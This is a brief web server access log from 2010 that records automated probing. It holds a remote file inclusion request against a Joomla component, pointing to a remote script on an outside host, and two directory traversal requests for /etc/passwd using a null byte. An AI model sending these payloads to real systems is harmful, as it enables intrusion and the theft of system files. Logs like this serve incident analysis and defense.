121.190.102.21 - - [18/May/2010:20:51:14 -0500] "GET /logs//component/option,com_frontpage/Itemid,1//index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:20:52:47 -0500] "GET /logs/access_log.1254528000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
202.162.219.163 - - [18/May/2010:20:53:50 -0500] "GET /logs/config.php?path_to_root=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
202.162.219.163 - - [18/May/2010:20:53:50 -0500] "GET /config.php?path_to_root=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
